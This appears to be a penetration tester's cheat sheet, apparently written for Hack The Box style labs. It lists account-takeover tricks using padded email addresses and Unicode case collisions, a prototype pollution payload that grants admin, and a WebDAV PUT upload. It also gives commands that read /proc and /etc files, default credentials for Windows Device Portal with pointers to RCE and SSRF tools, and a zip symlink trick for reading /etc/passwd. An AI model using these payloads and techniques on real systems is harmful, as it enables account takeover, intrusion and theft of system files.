1. While registering account, try to append a space at the end of already registered email to attempt user account takeover(db removes trailing space while inserting however application not).
2. If email maximum length is fixed and characters after allowed length are stripped, try to register an email having spaces appended till maximum character length + any character at end, eg <admin@htb.com #>.
unicode characters collide with few english characters. This fact can be used to exploit functionalities like - when Forgot password emails validated against lowercase/uppercase value on file, but sent to the provided input email.
// https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/
//uppercase scenario
chr(0x017f).upper()=='S' # returns True
chr(0x0131).upper()=='I'
// lowercase scenario
chr(0x212A).lower()=='k'
Using this bug, we can set new properties of objects. Eg- we can set json object {"user":"test"} new property admin=true if server takes json data and sets attributes using it.
payload {"user":"test","__proto__":{"admin":true}}
a={}
b=1
c='ds'
# polluting prototype
a.__proto__.foo='bar'
# All objects have foo property now with value bar
d=new Object
d.foo=='bar' # true
b.foo=='bar' # true
curl -X PUT http://192.168.14.129/dav/test.txt
cadaver http://target/dav
cat /proc/version
cat /etc/issue
cat /proc/self/environ
cat /proc/net/tcp # listening processes tcp
cat /proc/net/udp # listening processes udp
-
Windows Device Portal - port 8080
Windows IoT Core devices support a special webserver called the Device Portal. Windows Device Portal runs on port 8080 in Development mode and has default credentials as Administrator and p@ssw0rd (zero).
RCE can be acheived using the vulnerability in Sirep/WPCon communications protocol included with Windows IoT operating system.
// git clone the repo https://github.com/SafeBreach-Labs/SirepRAT
-
CallStranger(CVE-2020-12695) Vulnerability - port 37215
The vulnerability – CallStranger – is caused by Callback header value in UPnP SUBSCRIBE function can be controlled by an attacker and enables an SSRF-like vulnerability.
// git clone the repo https://github.com/yunuscadirci/CallStranger
If zip files can be uploaded and content is accessible. Try to access local files using this bug.
mkdir test
cd test
ln -s /etc/passwd link.txt
cat link.txt # prints content of /etc/passwd
zip --symlinks -r test.zip test/
unzip -l test.zip